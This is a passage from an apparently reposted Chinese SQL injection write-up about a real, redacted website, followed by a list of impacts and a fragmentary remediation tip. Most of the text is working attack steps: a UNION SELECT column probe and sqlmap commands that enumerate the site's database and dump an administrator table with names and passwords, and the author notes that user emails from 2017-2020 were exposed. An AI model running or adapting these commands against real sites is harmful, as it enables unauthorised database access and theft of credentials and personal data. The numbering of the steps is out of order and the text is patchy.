2.猜解当前表的列数,16列正确并正常返回,17列返回异常
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16 –+返回3和7,并在图片里面返回12
4.查看其数据库名和数据库版本:
sqlmap -u “http://******.com/content.php?id=268” –dbs
sqlmap -u “http://******.com/content.php?id=268” -D *******2_db –tables
3)爆出administrator表的所有列和数据
sqlmap -u “http://******.com/content.php?id=268” -D *******2_db -T administrator –column
sqlmap -u “http://******.com/content.php?id=268” -D *******2_db -T administrator C AddTime,AdminID,AdminName,AdminPassword,ID,isFrozen,LoginTime,UpdateTime -dump
此表存在2017-2020年用户邮箱数据等敏感信息
另:以上此网站所有表都可使用sqlmap工具得到一些数据信息,在此不一一列举了。
1)攻击者未经授权可以访问数据库中的数据,盗取用户的隐私以及个人信息,造成用户的信息泄露。
2)可以对数据库的数据进行增加或删除操作,例如私自添加或删除管理员账号。
3)如果网站目录存在写入权限,可以写入网页木马。攻击者进而可以对网页进行篡改,发布一些违法信息等。
4)经过提权等步骤,服务器最高权限被攻击者获取。攻击者可以远程控制服务器,安装后门,得以修改或控制操作系统。
2)建议提交的url是否存在可控字段,若用户修改参数则自动跳转到某页面。
转自:黑白之道
觉得文章有用就打赏一下文章作者
支付宝扫一扫打赏
微信扫一扫打赏